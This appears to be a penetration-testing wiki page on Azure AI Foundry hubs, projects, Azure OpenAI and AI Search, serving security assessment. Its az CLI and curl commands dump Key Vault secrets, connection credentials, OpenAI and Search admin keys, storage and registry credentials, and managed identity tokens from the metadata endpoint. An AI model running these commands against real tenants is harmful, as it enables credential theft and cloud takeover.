# Az - AI Foundry, AI Hubs, Azure OpenAI & AI Search

{{#include ../../../banners/hacktricks-training.md}}

## Why these services matter

Azure AI Foundry is Microsoft's umbrella for building GenAI applications. A hub aggregates AI projects, Azure ML workspaces, compute, data stores, registries, prompt flow assets and connections to downstream services such as Azure OpenAI and Azure AI Search. Each component commonly exposes:

- Long-lived API keys (OpenAI, Search, data connectors) replicated inside Azure Key Vault or workspace connection objects.
- Managed Identities (MI) that drive deployments, vector indexing jobs, model evaluation pipelines and Git/GitHub Enterprise operations.
- Cross-service links (storage accounts, container registries, Application Insights, Log Analytics) that inherit hub/project-level permissions.
- Multi-tenant connectors (Hugging Face, Azure Data Lake, Event Hubs) that can leak upstream credentials or tokens.

Compromising a single hub/project can therefore translate into control over downstream managed identities, compute clusters, online endpoints and any search index or OpenAI deployment referenced by prompt flows.
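For example, if you land read access on the hub's default Key Vault, the replicated connector keys can often be read directly. A minimal sketch (the vault name is a placeholder and assumes you hold secret get/list permissions):

```bash
# Sketch: dump connector secrets mirrored into the hub/project default Key Vault
az keyvault secret list --vault-name <HUB-KV> -o table
az keyvault secret show --vault-name <HUB-KV> --name <SECRET-NAME> --query value -o tsv
```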

## Main components & security surface

- AI Hub (Microsoft.MachineLearningServices/workspaces with kind=Hub): Top-level object defining region, managed network, system datastores, default Key Vault, Container Registry, Log Analytics and hub-level identities. A compromised hub lets an attacker inject new projects, registries or user-assigned identities.
- AI Projects (Microsoft.MachineLearningServices/workspaces with kind=Project): Host prompt flows, data assets, environments, component pipelines and online/batch endpoints. Projects inherit the hub's resources and can also override them with their own storage, Key Vault and MI. Each workspace stores secrets under /connections and /datastores.
- Managed Compute & Endpoints: Includes managed online endpoints, batch endpoints, serverless endpoints, AKS/ACI deployments and on-demand inference servers. Tokens retrieved from the Azure Instance Metadata Service (IMDS) inside these runtimes usually carry the role assignments of the workspace/project MI (commonly Contributor or Owner).
- AI Registries & Model Catalog: Enable region-wide sharing of models, environments, components, data and evaluation results. Registries can auto-sync with GitHub/Azure DevOps, which means PATs can end up embedded inside connection definitions.
- Azure OpenAI (Microsoft.CognitiveServices/accounts with kind=OpenAI): Provides the GPT model family. Access is controlled via role assignments + admin/query keys. Many Foundry prompt flows persist the generated keys as secrets or environment variables reachable from compute jobs.
- Azure AI Search (Microsoft.Search/searchServices): Vector/index storage typically wired up through a Search admin key stored inside a project connection. Index data can contain sensitive embeddings, retrieved documents or raw training corpora.
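To get a quick inventory of the resource types above in the current subscription, a sketch with plain `az resource list` calls (the `kind` column distinguishes hubs/projects and OpenAI accounts where the provider populates it):

```bash
# Sketch: enumerate Foundry-related resource types across the subscription
for t in \
  Microsoft.MachineLearningServices/workspaces \
  Microsoft.CognitiveServices/accounts \
  Microsoft.Search/searchServices; do
  echo "== $t =="
  az resource list --resource-type "$t" \
    --query "[].{name:name, rg:resourceGroup, kind:kind, location:location}" -o table
done
```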

## Security-relevant architecture

### Managed Identities & Role Assignments

- AI hubs/projects can enable system-assigned or user-assigned identities. These identities usually hold roles on storage accounts, Key Vault, Container Registries, Azure OpenAI resources, Azure AI Search services, Event Hubs, Cosmos DB or custom APIs.
- Online endpoints inherit the project MI or can be overridden with a dedicated user-assigned MI per deployment.
- Prompt Flow connections and automated agents can request tokens via DefaultAzureCredential; capturing the metadata endpoint from the compute yields tokens for lateral movement (see the sketch below).
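A minimal sketch of that token capture from inside any managed compute, online deployment container or prompt flow runtime (standard IMDS endpoint; swap the `resource` parameter to pivot to other data planes):

```bash
# Request an ARM token for the attached managed identity via IMDS
curl -s -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Append &client_id=<UAMI-CLIENT-ID> if several user-assigned identities are attached.

# Other useful audiences (same call, different resource value):
#   https://vault.azure.net               -> Key Vault data plane
#   https://storage.azure.com/            -> Storage
#   https://cognitiveservices.azure.com   -> Azure OpenAI / Cognitive Services data plane
#   https://search.azure.com              -> Azure AI Search (when RBAC data-plane auth is enabled)
```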

### Network boundaries

- Hubs/projects support publicNetworkAccess, private endpoints, managed VNets and managed outbound rules. A misconfigured allowInternetOutbound or an openly exposed scoring endpoint allows direct exfiltration.
- Azure OpenAI and AI Search support firewall rules, Private Endpoint Connections (PEC), shared private link resources and trustedClientCertificates. When public access is enabled these services accept requests from any source IP that knows the key (see the exposure check below).
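A rough way to check that exposure from the management plane. This is a sketch: the exact JSON key casing differs between the az ml extension and the ARM-backed commands, so grepping the raw output avoids guessing JMESPath paths:

```bash
# Sketch: spot publicly reachable workspaces, OpenAI accounts and Search services
az ml workspace show --name <WS> --resource-group <RG> -o json | grep -i public_network_access
az cognitiveservices account show --name <AOAI-NAME> --resource-group <RG> -o json | grep -i publicnetworkaccess
az search service show --name <SEARCH-NAME> --resource-group <RG> -o json | grep -i publicnetworkaccess
```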

### Data & Secret Stores

- Default hub/project deployments create a storage account, an Azure Container Registry, a Key Vault, Application Insights and a Log Analytics workspace inside a hidden managed resource group (pattern: mlw-<workspace>-rg).
- Workspace datastores reference blob/data lake containers and can embed SAS tokens, service principal secrets or storage access keys.
- Workspace connections (for Azure OpenAI, AI Search, Cognitive Services, Git, Hugging Face, etc.) store their credentials in the workspace Key Vault and expose them through the management plane when the connection is listed (values come back as base64-encoded JSON; see the decoding sketch after this list).
- AI Search admin keys grant full read/write access to indexes, skillsets and data sources, and can retrieve the documents that feed RAG systems.
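A hedged sketch of pulling one connection over ARM and decoding its credential blob. The exact layout under `properties.credentials` varies per connection/auth type (ApiKey, PAT, SAS, ...), so dump the whole object if the filter comes back empty:

```bash
# Sketch: fetch a single connection and inspect/decode whatever credential material it returns
az rest --method GET \
  --url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections/<CONN>?api-version=2024-04-01" \
  | jq '.properties.credentials'   # assumed path; layout differs per authType
# If a value looks base64-encoded, decode it:
echo '<BASE64-BLOB>' | base64 -d
```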

### Monitoring & Supply Chain

- AI Foundry supports GitHub/Azure DevOps integration for code and prompt flow assets. OAuth tokens or PATs live in Key Vault + connection metadata.
- The Model Catalog can mirror Hugging Face artifacts. If trust_remote_code=true, arbitrary Python runs during deployment.
- Data/feature pipelines log to Application Insights or Log Analytics, exposing connection strings (see below).
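If the linked Application Insights component is readable, its connection string / instrumentation key can usually be pulled straight from the management plane. A sketch (requires the `application-insights` CLI extension; names are placeholders and output key names may vary slightly by CLI version):

```bash
# Sketch: recover the telemetry connection string of the workspace-linked App Insights
az extension add --name application-insights 2>/dev/null
az monitor app-insights component show --app <APPINSIGHTS-NAME> --resource-group <RG> \
  --query "{connectionString:connectionString, instrumentationKey:instrumentationKey}"
```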

## Enumeration with az

```bash
# Install the Azure ML / AI CLI extension (if missing)
az extension add --name ml

# Enumerate AI Hubs (workspaces with kind=hub) and inspect properties
az ml workspace list --filtered-kinds hub --resource-group <RG> --query "[].{name:name, location:location, rg:resourceGroup}" -o table
az resource show --name <HUB> --resource-group <RG> \
--resource-type Microsoft.MachineLearningServices/workspaces \
--query "{location:location, publicNetworkAccess:properties.publicNetworkAccess, identity:identity, managedResourceGroup:properties.managedResourceGroup}" -o jsonc

# Enumerate AI Projects (kind=project) under a hub or RG
az resource list --resource-type Microsoft.MachineLearningServices/workspaces --query "[].{name:name, rg:resourceGroup, location:location}" -o table
az ml workspace list --filtered-kinds project --resource-group <RG> \
--query "[?contains(properties.hubArmId, '/workspaces/<HUB>')].{name:name, rg:resourceGroup, location:location}"

# Show workspace level settings (managed identity, storage, key vault, container registry)
az ml workspace show --name <WS> --resource-group <RG> \
--query "{managedNetwork:properties.managedNetwork, storageAccount:properties.storageAccount, containerRegistry:properties.containerRegistry, keyVault:properties.keyVault, identity:identity}"

# List workspace connections (OpenAI, AI Search, Git, data sources)
az ml connection list --workspace-name <WS> --resource-group <RG> --populate-secrets -o table
az ml connection show --workspace-name <WS> --resource-group <RG> --name <CONNECTION>
# For REST (returns base64 encoded secrets)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections/<CONN>?api-version=2024-04-01"

# Enumerate datastores and extract credentials/SAS
az ml datastore list --workspace-name <WS> --resource-group <RG>
az ml datastore show --name <DATASTORE> --workspace-name <WS> --resource-group <RG>

# List managed online/batch endpoints and deployments (capture identity per deployment)
az ml online-endpoint list --workspace-name <WS> --resource-group <RG>
az ml online-endpoint show --name <ENDPOINT> --workspace-name <WS> --resource-group <RG>
az ml online-deployment show --name <DEPLOYMENT> --endpoint-name <ENDPOINT> --workspace-name <WS> --resource-group <RG> \
--query "{identity:identity, environment:properties.environmentId, codeConfiguration:properties.codeConfiguration}"

# Discover prompt flows, components, environments, data assets
az ml component list --workspace-name <WS> --resource-group <RG>
az ml data list --workspace-name <WS> --resource-group <RG> --type uri_folder
az ml environment list --workspace-name <WS> --resource-group <RG>
az ml job list --workspace-name <WS> --resource-group <RG> --type pipeline

# List hub/project managed identities and their role assignments
az identity list --resource-group <RG>
az role assignment list --assignee <MI-PRINCIPAL-ID> --all

# Azure OpenAI resources (filter kind==OpenAI)
az resource list --resource-type Microsoft.CognitiveServices/accounts \
--query "[?kind=='OpenAI'].{name:name, rg:resourceGroup, location:location}" -o table
az cognitiveservices account list --resource-group <RG> \
--query "[?kind=='OpenAI'].{name:name, location:location}" -o table
az cognitiveservices account show --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account keys list --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account deployment list --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account network-rule list --name <AOAI-NAME> --resource-group <RG>

# Azure AI Search services
az search service list --resource-group <RG>
az search service show --name <SEARCH-NAME> --resource-group <RG> \
--query "{sku:sku.name, publicNetworkAccess:properties.publicNetworkAccess, privateEndpoints:properties.privateEndpointConnections}"
az search admin-key show --service-name <SEARCH-NAME> --resource-group <RG>
az search query-key list --service-name <SEARCH-NAME> --resource-group <RG>
az search shared-private-link-resource list --service-name <SEARCH-NAME> --resource-group <RG>

# AI Search data-plane (requires admin key in header)
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/indexes?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/datasources?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/indexers?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"

# Linkage between workspaces and search / openAI (REST helper)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections?api-version=2024-04-01" \
--query "value[?properties.target=='AzureAiSearch' || properties.target=='AzureOpenAI']"

```

## What to look for during an assessment

- Identity scope: Projects often reuse a single powerful user-assigned identity across multiple services. Capturing IMDS tokens from any managed compute inherits those privileges.
- Connection objects: The base64 payload includes the secret plus metadata (endpoint URL, API version). Many teams leave OpenAI + Search admin keys here instead of rotating them frequently.
- Git & external source connectors: PATs or OAuth refresh tokens can grant push access to the code that defines pipelines/prompt flows.
- Datastores & data assets: Provide SAS tokens valid for months; data assets can point to customer PII, embeddings or training corpora.
- Managed network overrides: allowInternetOutbound=true or publicNetworkAccess=Enabled makes it trivial to exfiltrate secrets from jobs/endpoints.
- Hub-managed resource group: Contains the storage account (<workspace>storage), container registry, Key Vault and Log Analytics. Access to that RG often means full takeover even if the portal hides it (see the sketch below).
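A hedged sketch for poking at that hidden resource group once you know (or guess) its name; resource/account names are placeholders and everything depends on the RBAC you actually hold:

```bash
# Sketch: enumerate the hub-managed resource group and harvest credentials where RBAC allows
az resource list --resource-group <MANAGED-RG> -o table
az storage account keys list --account-name <WORKSPACE-STORAGE> --resource-group <MANAGED-RG>
az acr credential show --name <WORKSPACE-ACR>   # only works if the ACR admin user is enabled
```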

## References

{{#include ../../../banners/hacktricks-training.md}}